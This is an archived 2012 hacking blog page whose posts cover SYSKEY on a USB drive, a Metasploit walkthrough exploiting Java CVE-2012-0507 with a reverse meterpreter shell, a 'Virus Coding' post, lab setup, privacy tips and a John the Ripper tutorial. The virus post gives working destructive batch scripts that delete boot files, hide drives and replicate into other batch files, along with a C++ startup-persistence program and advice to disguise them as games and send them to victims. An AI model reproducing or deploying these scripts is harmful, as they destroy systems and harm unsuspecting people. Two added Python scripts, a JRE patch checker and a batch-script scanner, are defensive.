Monday, August 27, 2012

Lock/Unlock Computer With Pendrive


First, what is “syskey”?

SYSKEY is a utility that encrypts the hashed password information in a SAM database in a Windows system using a 128-bit encryption key.
SYSKEY was an optional feature added in Windows NT 4.0 SP3. It was meant to protect against offline password cracking attacks so that the SAM database would still be secure even if someone had a copy of it. However, in December 1999, a security team from BindView found a security hole in SYSKEY which indicated that a certain form of cryptanalytic attack was possible offline. A brute force attack then appeared to be possible.
Microsoft later collaborated with BindView to issue a fix for the problem (dubbed the ‘Syskey Bug’), which appears to have been settled, and SYSKEY has been pronounced secure enough to resist brute force attack.
According to Todd Sabin of the BindView team RAZOR, the pre-RC3 versions of Windows 2000 were also affected.
So this is pretty cool, right?  Well, I really like the idea of keeping this on a floppy so that booting requires the floppy disk (a sort of two-factor (hardware/software) authentication?).
Naturally I wanted to go a bit further and use this on a USB drive instead of storing to a Floppy.  I can’t see myself carrying a floppy and a USB floppy drive around with me.  After all, this provides another layer of security.
NOTE:  I haven’t tested copying data from 1 USB to another USB to see if it works as a backup.  This way you could lock up a USB drive as a spare if needed.
Here’s how to get this to work using a USB drive.
1.  Insert your USB drive into your system and wait for it to be recognized and install any necessary drivers.
2.  Fire up disk management and re-assign the drive letter it was given to “A”.


Start up disk management by clicking Start and typing diskmgmt.msc



Right-click the USB drive and choose to assign drive letter or path.

Assign it to letter “A”

Accept the warning message

Now your USB drive is “A”

3.  Run Syskey and save encryption to USB Drive “A”

Click Start and type syskey followed by hitting Enter

Syskey launched; Click “Update”

Choose “Store Startup key on floppy disk” and click “OK”

You’ll be prompted to enter your diskette. Make sure your USB drive is inserted and writable.
4.  Reboot and have fun.  Don’t lose your USB disk!  Also, to revert this, you can run syskey again and choose to store it locally instead of “on a floppy disk”.

How to hack remote computer using Metasploit? Exploiting Java vulnerability CVE-2012-0507



Whenever someone says PenTesting tool, the first thing that comes to mind is Metasploit. Today, I am going to demonstrate how to use the Metasploit tool to exploit the popular Java AtomicReferenceArray Type Violation vulnerability (CVE-2012-0507).
About Metasploit:
Metasploit is a very powerful PenTesting tool. The Metasploit Framework is a tool for developing and executing exploit code against a remote target machine. The Metasploit Project is also well known for anti-forensic and evasion tools, some of which are built into the Metasploit Framework. It is a very useful tool for information gathering, vulnerability scanning, exploit development, client-side exploits, ...
Mastering the Framework: A free course from Offensive-Security
The Offensive Security Team, along with several active community members, made a free course on the Metasploit Framework, "Mastering the Framework". The course covers information gathering, social engineering attacks, exploit development, advanced AV avoidance, etc.

The course is available here:
www.offensive-security.com/metasploit-unleashed/Introduction

Donate to HFC, Feed a Child!
"Mastering the Framework" is a free course. If you enjoyed the course, please donate to Hackers for Charity (HFC). Beyond merely providing food for children in need in East Africa, the Hackers for Charity Food Program enables children and their families to provide for themselves and become more self-sufficient by teaching them valuable agricultural skills. Every cent received is sent directly to Hackers for Charity in support of their mission. Any amount, no matter how small, makes a difference; it only takes $9.00 to feed a child for a month.

You can find further details about the donation here:
http://www.offensive-security.com/metasploit-unleashed/Donate

Hey, where are you going?! Wait a sec, take that course once I have demonstrated how to use Metasploit, because it will be hard to understand or boring if you read those things directly.

Requirements:
  • VirtualBox 
  • Target OS(windows,...)
  • PenTesting Distro(Backtrack )
  • JRE 6(unpatched version)

CVE-2012-0507 is a vulnerability in the JRE: the AtomicReferenceArray class implementation did not properly check whether the array is of the expected Object[] type. A malicious Java application or applet could use this flaw to crash the Java Virtual Machine (JVM) or bypass Java sandbox restrictions.
Security News: This vulnerability affects Windows, Mac and Linux operating systems. Last month, Flashback malware infected more than 600,000 Mac computers by exploiting this vulnerability. Recently, the INSS and Amnesty International UK websites were injected with malicious code that exploits CVE-2012-0507.
I am going to demonstrate this vulnerability with VirtualBox.  I have set up two virtual machines, namely "Target" and "BT5". I have installed XP 2 on the Target and Backtrack 5 R2 on the 'BT5'.

(need help in configuring the VM?, read this: setup PenTesting Lab).

Part I: Preparing the Target Machine:
Start the "Target" Machine.
Install the JRE 6.

Part II: Preparing the PenTesting Machine:
Now, start the BT5.

Open the Terminal and type "msfupdate".  This will update the Metasploit Framework (MSF) with the latest exploits and payloads. As CVE-2012-0507 is the latest vulnerability, you have to update the MSF before proceeding further.

slow Internet Connection?! If you have slow internet connection, then you can download the java_atomicreferencearray module alone instead of updating all modules.
Download the java_atomicreferencearray.rb and paste in this folder "/opt/metasploit/msf3/modules/exploits/multi/browser/"

Then, Download CVE-2012-0507.jar and paste in this folder "/opt/metasploit/msf3/data/exploits/"

Part III :

Exploiting the Java AtomicReferenceArray Type Violation Vulnerability:



Step 1:
Open the Terminal and type "msfconsole".  This will bring the Metasploit console , here you can interact with the MSF.

Step 2:
Type "use exploit/multi/browser/java_atomicreferencearray" . This command will use the java_atomicreferencearray.rb module for the attack.


Now type "show options" to display which settings are available and/or required for this specific module.



Now type "set SRVPORT 80".
and  "set URIPATH /".



Step 3: Set Payload
Type "show payloads"; this will display the list of payloads.  We are going to use the 'reverse_tcp' payload. This payload makes the Target open a reverse TCP connection back to the PenTesting machine.

Type 'set payload java/meterpreter/reverse_tcp' in the console.


set LHOST [IP_address] :  In order to get reverse connection, we have to set our IP in the LHOST. 

open the Terminal and type "ifconfig". This will display the IP info of our PenTesting Machine.  The IP will be "192.168.56.x".   For instance, let me say the ip is 192.168.56.10.

Now  Type in the msfconsole as "set LHOST 192.168.56.10".



Part IV: Breaching the Target Machine:

So , are you ready?! Let us break into the Target Machine.

Step 1:

Type "exploit" in the msfconsole. This will start the reverse handler on our machine, which will wait for anyone who connects to our HTTP server (e.g. http://192.168.56.10). Once the victim connects to our server, it will send a JAR that exploits the CVE-2012-0507 vulnerability.

step 2:

Open the Firefox/IE in the Target machine. 
Enter "http://192.168.56.10".
It loads nothing but exploit will run in the background.
Step 3:
Open the BT5 machine, it will display the following output:


Now type "sessions", this will show the list of active sessions .

Type "sessions -i 1"; this will open the connection to the session with the id '1' and bring you to Meterpreter. Meterpreter lets you interact with and control the Target.


Step 4:Upload files

Yeeeh..! we got backdoor to the Target machine, now we can run any commands in the Target.

For Example, Typing 'sysinfo' will display the system information.

You can also upload and execute your own executable files in the Target machine.

'upload /Test.exe c:\\': this command will upload Test.exe from the root ('file system' dir) folder of the BT5 to the C drive of the Target.

'execute -f C:\\Test.exe': this command will run our uploaded file on the Target.


Security Tips:
Update your JRE to the latest version.
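
To apply this tip across several machines, each installed JRE can be compared against the first update level that carries the fix. The Python script below is an added example, not part of the original post; it assumes the fix for CVE-2012-0507 first shipped in Java 5.0 Update 34, Java 6 Update 31 and Java 7 Update 3 (Oracle's February 2012 update), and the `java -version` banners and host names in it are constructed.

```python
import re

# Assumption: first update level per major version that contains the fix
# (Oracle Java SE Critical Patch Update, February 2012).
FIRST_FIXED_UPDATE = {5: 34, 6: 31, 7: 3}

# Matches both the legacy banner (version "1.6.0_30") and the modern one
# (version "11.0.2").
VERSION_RE = re.compile(r'version "(\d+)(?:\.(\d+))?(?:\.\d+)*(?:_(\d+))?')


def parse_java_version(banner):
    """Return (major, update) from `java -version` output, or None."""
    match = VERSION_RE.search(banner)
    if match is None:
        return None
    first = int(match.group(1))
    if first == 1:
        # Legacy scheme: 1.<major>.0_<update>; a GA build has no update part.
        if match.group(2) is None:
            return None
        return int(match.group(2)), int(match.group(3) or 0)
    # Modern scheme (Java 9 and later): the first number is the major version.
    return first, 0


def assess(banner):
    """Classify one banner as 'vulnerable', 'patched' or 'unknown'."""
    parsed = parse_java_version(banner)
    if parsed is None:
        return "unknown"
    major, update = parsed
    if major > 7:
        return "patched"      # released after the fix
    if major not in FIRST_FIXED_UPDATE:
        return "unknown"      # outside the table: needs a manual check
    return "vulnerable" if update < FIRST_FIXED_UPDATE[major] else "patched"


def hosts_needing_update(inventory):
    """Return the sorted host names whose JRE is vulnerable or unknown."""
    return sorted(host for host, banner in inventory.items()
                  if assess(banner) != "patched")


# Constructed inventory: host name -> first line of `java -version`.
SAMPLE_INVENTORY = {
    "lab-xp-target": 'java version "1.6.0_30"',
    "lab-win7": 'java version "1.6.0_31"',
    "lab-mac": 'java version "1.7.0_02"',
    "build-server": 'openjdk version "11.0.2" 2019-01-15',
    "kiosk": "java: command output not captured",
}

if __name__ == "__main__":
    for host in hosts_needing_update(SAMPLE_INVENTORY):
        print(host, assess(SAMPLE_INVENTORY[host]))
```
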

conclusion:
I hope this article has given you a good insight into how to use MetaSploit Framework to exploit the Java vulnerability.  I hope this will help you to get into the PenTesting world..!

So, you enjoyed the Tutorial , right?! If you have any suggestion or have doubt, please drop your comment/mail me. 

Virus Coding


 

Viruses that crash your own PC!

@echo
offattrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c “A VIRUS IS TAKING OVER c:Drive
Save as bat file in notepad!!
This will pop up a message saying OWNED!!
And shut down the computer never to reboot again!
Type this in notepad
start virus.bat
virus.bat
and save as with this name – virus.bat
Your antivirus will not detect this virus.
Basically this program will delete all the files which are needed for booting. If your OS is installed on the D drive instead of C, then replace c with d.
Save it as 'sth.bat'(Virus Coding)!!
Matrix Virus!
#include
#include
#include
#include
#include
#include
#include
using namespace std;
int main()
{ keybd_event(VK_MENU,0×38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0×38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);
{
char buffer[255];
char inputFile[]=”C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat”;
ifstream input(inputFile);
if (!input)
{
{
ofstream fp(“C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat”, ios::app);
fp << "@ECHO OFF \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}
{
char buffer[255];
char inputFile[]="C:\\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "COPY matrix.exe C:\\rawr.exe \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}
START:{
for(int i = 0; i
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout <
cout <
cout <
cout <
cout <
cout <
cout <
cout <
cout <
cout <
cout <
cout <
Sleep(60);
}
}
for ( int j = 0; j
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout <
}
goto START;
}
Open notepad and paste this:
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Save it as eicar.com. The Anti-Virus should stop you (if it does that means its working).
Batch Virus Code Creation:
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n
shutdown -r -c \”Sorry Your System is hacked by us!\” -f
I think this code will be simple for non-C++ programmers. It is also easy to create the batch file.
Copy the above code to notepad.
Save it with .bat extension (for ex: nodrivevirus.bat)
Send the file to your victim
Ebomb a virus for fun
This is a simple attack that enables running multiple applications in victims pc just to harass him. There are many ways to ebomb but this is the most easiest way to do it. Simply open notepad and type
@echo off
start iexplore
start notepad
start firefox
and save it as anyname.bat (note: paste the code with “start ” in many times to annoy them)
you can also do some additional stuff like enter the message for victim eg. msg * “(Now your pc is getting Hacked)”
and also you can open some websites to irritate victim eg.
start iexplore “www.ethicalhack4u.blogspot.com”
start firefox “www.maverick-deepanker.blogspot.com”
(simply add them in the .bat file you created)
Now just like always upload the file on any online storage (rapidshare, ziddu,hotfile or fileserve)
and send the link to your victim (you can probably make him believe that its game or just any other app simply by converting the .bat in .exe by using any batch to exe converter. You can also send it via pen drive. The main purpose is to send it to victim.
When victim will open it ………….. :D
(Sample eg.
@echo off
msg * “(sorry buddy but you just f*$%d your self)”
start iexplore “Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
and then simply save it as “anyname.bat”
Note : The only way to get out of any ebomb attack is simply by System restart
How to create an advanced and dangerous virus:
@echo off>nul.ViRuS
if “%1==”/ViRuS_MULTIPLY goto ViRuS_multiply
if “%1==”/ViRuS_OUTER_LOOP goto ViRuS_outer_loop
if “%1==”/ViRuS_FINDSELF goto ViRuS_findself
if “%VOFF%==”T goto ViRuS_OLDBAT
set ViRuSname=%0
if not exist %0.bat call %0 /ViRuS_FINDSELF %path%
if not exist %ViRuSname%.bat set ViRuSname=
if “%ViRuSname%==” goto ViRuS_OLDBAT
rem ViRuS if batch is started with name.BAT, virus will not become active
rem ViRuS it was a bug, now it’s a feature ! (also notice the voff variable)
rem ViRuS also if batch was only in an append /x:on path (chance=minimal)
attrib +h %ViRuSname%.bat
for %%a in (%path%;.) do call %0 /ViRuS_OUTER_LOOP %%a
attrib -h %ViRuSname%.bat
set ViRuSname=
goto ViRuS_OLDBAT
:ViRuS_findself
if “%2==” goto XXX_END>nul.ViRuS
if exist %2\%ViRuSname%.bat set ViRuSname=%2\%ViRuSname%
if exist %ViRuSname%.bat goto XXX_END
if exist %2%ViRuSname%.bat set ViRuSname=%2%ViRuSname%
if exist %ViRuSname%.bat goto XXX_END
shift>nul.ViRuS
goto ViRuS_findself
:ViRuS_outer_loop
for %%a in (%2\*.bat;%2*.bat) do call %0 /ViRuS_MULTIPLY %%a
goto XXX_END>nul.ViRuS
:ViRuS_multiply
find “ViRuS” xViRuSx.bat
find /v “ViRuS” >xViRuSx.bat
echo :XXX_END>>xViRuSx.bat
copy xViRuSx.bat %2>nul
del xViRuSx.bat
goto XXX_END>nul.ViRuS
:ViRuS_OLDBAT
echo on>nul.ViRuS
echo This Virus Is Made By U-Hacker.
:XXX_END
Save it as virus7.exe and release the monster.
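
For defenders, the batch scripts in this post share a handful of static traits that can be matched before a file is ever run: stripping attributes from and deleting boot files, forced shutdowns, Explorer policy values that hide drives, references to the Startup folder, and loops over other .bat files. The Python triage script below is an added example, not code from the original post; the rule names, weights, threshold and sample scripts are constructed for illustration.

```python
import re

# (rule name, weight, pattern). Weights and names are illustrative choices.
RULES = [
    ("boot_file_tamper", 5, re.compile(
        r"\b(?:del|erase|attrib)\b.*\b(?:ntldr|boot\.ini|autoexec\.bat)\b", re.I)),
    ("forced_shutdown", 2, re.compile(
        r"\bshutdown(?:\.exe)?\s+(?:\S+\s+)*?[-/][sr]\b", re.I)),
    ("explorer_drive_lockout", 4, re.compile(
        r"\breg\s+add\b.*policies\\+explorer\b.*\b(?:NoDrives|NoViewOnDrive)\b", re.I)),
    ("startup_folder_reference", 3, re.compile(
        r"Start Menu\\+Programs\\+Startup", re.I)),
    ("batch_file_sweep", 4, re.compile(
        r"\bfor\s+%%\w\s+in\s+\([^)]*\*\.bat", re.I)),
    ("broadcast_message", 1, re.compile(r"^\s*msg\s+\*", re.I)),
]


def scan_batch(text):
    """Return a list of (line_number, rule_name, weight) hits for a script."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        # Comments cannot execute, so they are not scored.
        if not stripped or stripped.lower().startswith(("rem ", "::")):
            continue
        for name, weight, pattern in RULES:
            if pattern.search(stripped):
                findings.append((lineno, name, weight))
    return findings


def verdict(findings, threshold=5):
    """Score each rule once and return (label, score)."""
    score = sum(weight for _, weight in {(name, w) for _, name, w in findings})
    if score >= threshold:
        return "suspicious", score
    return ("review", score) if score else ("clean", 0)


# Constructed samples. Raw strings keep the backslashes literal.
SAMPLE_DESTRUCTIVE = r"""@echo off
attrib -r -s -h c:\ntldr
del c:\ntldr
msg * hello
shutdown -s -t 7
"""

SAMPLE_POLICY = r"""REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer /v NoDrives /t REG_DWORD /d 12
"""

SAMPLE_BENIGN = r"""@echo off
rem nightly cleanup; never touches ntldr
del /q %TEMP%\*.tmp
shutdown /a
"""

if __name__ == "__main__":
    for label, sample in (("destructive", SAMPLE_DESTRUCTIVE),
                          ("policy", SAMPLE_POLICY),
                          ("benign", SAMPLE_BENIGN)):
        hits = scan_batch(sample)
        print(label, verdict(hits), hits)
```

A static match only prioritises a file for review; a script that is renamed to another extension or converted to an .exe needs the same checks applied to its embedded strings.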

Sunday, August 26, 2012

Protect your Computer from Viruses and Hackers


How do you protect your computer? 

Check this out [Works for Windows XP, Vista]

This trick will help against hackers & viruses (it is mostly helpful against viruses)

Caution: You must be Admin or must have Admin privileges

Step 1:

Go to “Folder Options” in “Control Panel” –> “View” tab.
Uncheck “Use Simple File Sharing” –> Apply & OK.

Step 2:

Right-click on the C: drive (if the operating system is installed on the C: drive) –> Properties.
You will see a new tab called “Security”; click on it.
Select Users under “Group or user names” (you will see all permissions of users on the C: drive) –> edit them as per your requirement (Suggestion: uncheck Write permission for all users except Admin) & apply.
Restart it!

Mission Over 

[Suggestion: Use this trick during a fresh installation, and for everyday work use a different user account that has no Admin privileges]

How to Set up your Pen Testing / Ethical Hacking Lab with a single Computer ?

We have provided you with plenty of ethical hacking and pentesting tutorials, and more articles are on the way.  Meanwhile, I would like to teach you how to set up your own Pen Testing / hacking network lab.

Use of your own Pen Testing Lab:

  • Free, free, free! It's a free lab, because it is yours.
  • Only one system is enough
  • You can practice your pentesting/hacking skills
  • You can install any kind of malware (spyware, trojans) or RATs and test how they work
  • and more ...
Is it possible to create a lab with a single system?
Yes, you can. We are going to set up a lot of vulnerable systems virtually.  Confused? VirtualBox is open source software provided by Oracle Corp. that allows you to run multiple guest OSes (virtual systems) on a single system.

Requirements:
  • Virtual box latest version and its extension (get it from here: www.virtualbox.org/) 
  • Windows XP image file(xp.iso) ; it is going to be our target system
  • Backtrack Linux image file(backtrack5.iso); we are going to launch the attack from this OS.
First of all, Learn how to configure the Guest OS in VirtualBox from here:
https://www.virtualbox.org/manual/UserManual.html
This page will explain everything about VirtualBox and how to set up a Guest OS.

I hope you are now familiar with installing a Guest OS.

Set Up your Target system:
Now we have to set up the target system.  Install Windows XP in VirtualBox using the xp.iso file.  After the installation has completed, disable the Firewall in XP so that it becomes a more vulnerable system.

Set up your PenTesting System:
Install Backtrack5 in VirtualBox. Backtrack is a penetration testing Linux distribution that has a lot of hacking tools.  We will hack the target system using Backtrack.

Network Settings for Guest Os:
Step 1:
Click the File menu in VirtualBox and select Preferences.
Now select the Network tab.
Click the + symbol at the side; that will add a new Host-only network.

Step2:

Right-click on the Guest OS (e.g. xp, backtrack) and select Settings.
Select the Network tab.
Now you can see the "Attached to" option menu.
Change it from NAT to "Host only Adapter".
Do the same thing for both Guest OSes.

Step 3:


Now run both guest OSes.
Finding the IP address of the Target System:
Open the Windows XP Guest OS window.
Open cmd in Windows XP and type ipconfig.
This will show the IP address of XP. It will be 192.168.56.101
Hacking with the Pen Testing System:
Open the Terminal and type "nmap 192.168.56.101".
Now it will show the list of open ports.

You can hack the target system with open ports.

Thursday, August 23, 2012

Hacking



IP & Subnetting Workbook For CCNA Students - prt 2



IP & Subnetting Workbook For CCNA Students - prt 1



Wednesday, August 22, 2012

Free Download Ebook Ethical Hacking (EC-Council Exam 312-50)


EC-Council E-Business Certification Series
Developer - Thomas Mathew
Publisher - OSB Publisher
ISBN No - 0972936211
By explaining computer security and outlining methods to test computer systems for possible weaknesses, this guide provides the tools necessary for approaching computers with the skill and understanding of an outside hacker.


Introduction
This module attempts to bridge various aspects of ethical hacking by suggesting an approach for undertaking penetration testing. There are different ways of approaching a penetration test.
  • External Approach
    • With some prior knowledge
    • Without prior knowledge
  • Internal Approach
    • With some prior knowledge
    • With deep knowledge
Whatever the approach adopted, it is a fact that penetration testing is constrained by time and availability of resources, which varies from client to client. To effectively utilize both these telling factors, penetration testers adopt some form of structure or methodology. These can be checklists developed by consulting practices, widely available resources such as Open Source Security Testing Methodology or a customized attack strategy.
There is no single methodology that can be adopted across client organizations. The skeletal frame of testing, however, is more or less similar. The terms of reference used for various phases may differ, but the essence is the same. As discussed in preceding modules, the test begins with:
  • Footprinting / Information Gathering phase
  • Discovery and Planning / Information Analysis phase
  • Detecting a vulnerability / security loophole
  • Attack / Penetration / Compromise
  • Analysis of security posture / Cover up / Report
  • Clean up
The general objective of a penetration test is to reveal where security fails. The result of a penetration test can be:
  • successful attack - when the objective is met within the scope of the attack
  • a partial success - when there has been a compromise, but not enough to achieve the objective
  • a failure - when the systems have been found to be robust to the attack methodology adopted
Foot printing / Information Gathering phase:
  • Client site intelligence
  • Infrastructure fingerprinting
  • Network discovery and Access point discovery
Discovery and Planning / Information Analysis phase
  • Target Identification
  • Resource and Effort Estimation
  • Modeling the Attack strategy (s)
  • Relationship Analysis
Detecting a vulnerability / security loophole
  • Vulnerability Analysis
  • Scanning
  • Enumeration
  • Zeroing the target
Attack / Penetration / Compromise
  • Exploring viable exploits (new / created / present)
  • Executing the attack / Alternate attack strategy
  • Target penetration
  • Escalating the attack
Analysis of security posture / Cover up / Report
  • Consolidation of attack information
  • Analysis and recommendations
  • Presentation and deliverables
Clean up
  • Clean up tasks and procedures
  • Restoring security posture


Tuesday, August 21, 2012

History of Hacking (1-5)


How to stop Facebook from browser tracking you



Many websites, including Facebook (Like) and Google Plus (+1), use buttons for recommending web pages on social networks. These social networks also monitor your browsing behaviour, even if you don’t have an account, and this also happens even if you have third-party cookies disabled.
ShareMeNot is an extension in Chrome and an add-on in Firefox that allows you to stop Google and Facebook as well as other social networks from tracking you online. By default ShareMeNot blocks AddThis, Digg, Facebook, Google+, LinkedIn, Pinterest, StumbleUpon and Twitter. Check out my post from January last year where I suggest you use ShareMeNot.
ShareMeNot will now completely replace the buttons with local stand-in buttons (text). This design allows ShareMeNot to avoid making any requests at all to the trackers until you click on one of the buttons. The old version made requests to trackers to load the buttons; while ShareMeNot removed cookies from those requests, they could still reveal information like your IP address. Here is how you use ShareMeNot in Chrome and Firefox:
Google Chrome (extension)
  • Download and install ShareMeNot extension
  • You will find the ShareMeNot icon in the address bar
  • Click the icon – you can choose to > ‘Allow all trackers this time’ or deselect particular trackers by unticking them – then click > Done
  • *You can also click > ‘Manage tracker blocking’ – this lets you allow certain types of buttons on specific pages on that website. Click the > ‘Exceptions’ button next to the service you want to allow
  • Enter the domain name in the > ‘Add a new hostname pattern’ box and press ENTER. The exceptions are listed in the above box. You can cancel these exceptions by using the > ‘Remove All Exceptions’ button or click > ‘Close’ when you are done
  • To use any button, e.g. +1 (Google+), on a one-off basis, click the ShareMeNot button for that service. This will reinstate that button (e.g. the +1 button) for that page. You will need to reload the page to allow trackers that were blocked when the page was loaded.
  • Note: You can also run this tool in incognito mode
Mozilla Firefox (add-on)
  • Download and install ShareMeNot add-on
  • You will find the ShareMeNot icon is in the bottom right corner
  • Click the icon – you can choose > ‘Allow all trackers this time’ or deselect particular trackers by unticking them – then click > Done
  • To use any button, e.g. +1 (Google+), on a one-off basis, click the ShareMeNot button for that service. This will reinstate that button (e.g. the +1 button) for that page. You will need to reload the page to allow trackers that were blocked when the page was loaded.
  • Note: You can switch off ‘automatic updates’ from > Tools > add-ons
*This feature is not available in the Mozilla Firefox add-on
Why protect your online identity? Your personal information belongs to you; however, your personal information is of considerable interest to third parties. Third parties will sell or rent your data to other parties so they can collect information about you. I believe that you should have total awareness and control of your personal online data. If you are reading this post, then you are probably interested in using this useful privacy extension / add-on for protecting your online identity.

How to remove evercookies from your PC


When you visit a website, every website will store a text-based cookie on your PC – worth remembering it’s not an executable file. Websites will track your browser behavior using a cookie which is stored in your cache and history. The cookie is used for authentication (including encryption), storing site preferences and so forth. In fact a cookie can store anything that is “data”. Most browsers (IE, Firefox, Chrome, Safari) will allow users to delete cookies after a browser session (normally when you close the browser).

However there is one cookie which is very difficult to remove from your PC. The ‘evercookie’ is a persistent JavaScript API, which if you value your privacy, should have an option to be removed from a browser session – strangely it isn’t. For most surfers you will probably be unaware of this cookie and if you do know what it is, the chances are you will not know how to remove it. It’s little understood outside of technical and marketing circles – online advertisers and app developers are using evercookies more and more – so let’s have a closer look at how you can control and manage these persistent cookies.

The evercookie is stored in multiple data storage locations on your PC, so it’s very difficult to completely remove. Privacy wise, the evercookie can be deleted but it has an uncanny habit of regenerating itself. It behaves more like spyware or malware and I’ve heard it referred to as ‘obfuscated code’ – it is delivered as part of JavaScript, HTTP, Flash, Silverlight, HTML5 DOM etc – so this means the evercookie and its purpose are completely concealed from you. Is this malicious code? Probably, but it’s not illegal for the distributors to use. Still value your privacy? If you do, then I suggest you use either BleachBit or Maxa-tools which will stop most of these persistent cookies:
*BleachBit and Maxa-tools works with Firefox, Opera, Safari, Internet Explorer (IE), Google Chrome and many more Windows, Mac and Linux applications.
For those who use the popular CCleaner, this doesn’t currently remove these persistent cookies, so I’d suggest you use BleachBit or Maxa-tools to control/remove the evercookies. The most secure way to protect your browser from evercookies in my opinion, is to use a sandbox. This isn’t for beginners though.

Penetration Testers Open Source Toolkit 3rd Edition 2011 RETAiL EBook - DiGiBook

Friday, August 17, 2012

Learn How To Enable Your Task Manager If It Is Disabled In Windows Xp

 
Here nothing is needed to be downloaded , the main feature lies in your own computer . Just follow these easy steps.

Type gpedit.msc in the run.

Goto User Configuration>Administrative Templates>System. Now you may see a window like the given one:-

Click Ctrl+Alt+Del option.

Now you may see four options which are:
  1. Remove change password .
  2. Remove Lock Computer .
  3. Remove Task Manager .
  4. Remove Logoff .
  • Double click option number 3.
  • Now you may see a window like this:

Check Not Configured or Disabled . You are done. You may now see your Task Manager.

Top Hacking Forums

EC - COUNCIL CHIFI-Brochure V 8


Chfi Brochure

Welcome to CHIFI Training


Chfi Slide All

How to Hack a Forum


How to Hack a Forum - Tutorial

John the Ripper Tutorial

                                        John the Ripper Tutorial

---Introduction---

Well I've decided to make a John the Ripper tutorial. John the Ripper is a pretty good password cracking tool. Here is a description from the site(displayed later) where you get it:

Quote
John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.

I'm going to go through the Windows way to use John the Ripper and I will cover some of the basic types of attacks and things you can do with John the Ripper. This article will be fairly long so I can try and explain things in a way that I hope most people can understand.

---Some Bits of Information---

DES Hashes

John the Ripper is well known for its ability to deal with DES hashes (the type I'll be concentrating on in this article). I'm going to briefly explain what a DES hash is. DES stands for Data Encryption Standard and is a method for encrypting information like passwords. The key length for DES is 56 bits. The key actually consists of 64 bits, but only 56 of these are used by the algorithm; the other 8 bits are used solely for parity checking (error detection) and are therefore discarded. The DES hash will have 13 characters and will have a username or something similar on the front of it. Therefore, a DES hash will look like this: shape:CRjRYEn9g3PUc
As you can see, the username "shape" is in front of the 13-character encryption, and they are separated by a colon (:). If you would like to learn more about DES you can go here:
http://en.wikipedia.org/wiki/Data_Encryption_Standard

If you want to make your own DES hash just follow these steps:
- Go to this site:
http://www.yellowpipe.com/yis/tools/encrypter/index.php

- Type the text or password that you want to be encrypted in the text box
- Click on the drop-down menu and choose the option "DES Crypt (one way)"
*Note that it says one way because, while this site decrypts many things, it will not decrypt a DES hash; it will only encrypt something into one.
- Click OK
- Copy the encrypted text and paste it into Notepad with username: in front of it so it looks like my example above
- Save it in the run folder of John the Ripper as a .txt file

You now have your own DES hash

As you will see further on in the article, dictionary attacks use wordlists. If you want to get a wordlist, you can search online through Google or a similar search engine and find them easily. There are many, many places that have wordlists. A wordlist is simply a text document full of words that you place in the run folder of John the Ripper. An example of such a site is this:
http://www.theargon.com/achilles/wordlists/

Now let's start the tutorial.

---Installing on Windows---


First things first, if you don't already have John the Ripper, go here to download it:
http://www.openwall.com/john/

In case you were confused, the download you want as a Windows user is John the Ripper 1.7.0.1 (Windows - binaries, ZIP, 1360 KB).

Some tips for installing John the Ripper that will make things easier on you, though you do not have to follow them if you don't want to:
- Save it in the plain old C:/ location, not in Program Files or anywhere else
- When it installs it will probably look something like C:/John/john1701/ etc. Move everything out of the john1701 folder and into the first folder. Then delete john1701.
- Now when you go into your C drive and open up the john folder, you should see both the doc and run folders instead of john1701
- In the run folder you will see the application "john-386" or "john-something". Just rename that to "john"

